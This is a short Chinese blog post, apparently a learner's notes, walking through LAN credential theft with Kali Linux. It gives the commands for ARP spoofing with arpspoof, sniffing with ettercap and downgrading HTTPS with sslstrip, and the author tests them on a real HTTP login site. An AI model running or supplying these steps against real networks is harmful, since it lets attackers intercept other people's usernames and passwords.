学习:kail linux获取http和https账号密码

看了教程学着做了两三天，就是获取不了，我也很懵逼，今天又莫名其妙的又能获取了，其中的原因还有待探索。

 

使用arp欺骗，转发流量，然后开启arp欺骗：echo 1 >/proc/sys/net/ipv4/ip_forward

                                                                              cat /proc/sys/net/ipv4/ip_forward

                                                                              arpspoof -i eth0 -t 192.168.1.1 192.168.1.121

 

 

欺骗成功；然后进行ettercap ：ettercap -Tq -i eth0

  

 

使用一个使用http协议的登录网站进行测试：（这里使用的是一个好不容易发现的一个网站，因为现在基本大一点的网站都使用https协议加密了）defcon.cn

 

再查看kali 就会发现数据包已经抓下来了；（不知道为啥我要进行输入两次才能抓到，我也不知道原因，待探究）

、

user和PASS便是刚刚我们进行登录时输入的数据，CONTENT是http的内容，后面的log=xxxxxx  是使用URL加密的user同理pwd也是pass.

info便是我们进行登录的网址。

 

 

https账号密码获取：操作跟上面一样，不同的是要更改一下设置，然后把https转换为http,使用sslstrip进行转换;

首先使用命令：vim /etc/ettercap/etter.conf找到以下内容：

按下  i  键，进入编辑模式，把#if you use iptables:下面的两个#去掉。然后按下Esc，Shift+：,q!(不保存，退出)或 wq（保存，退出）

 

        l另开一个标签：sslstrip -a -f -k

 

 

感觉就算操作成功了，也还是一脸懵逼，因为还有好多不懂的地方。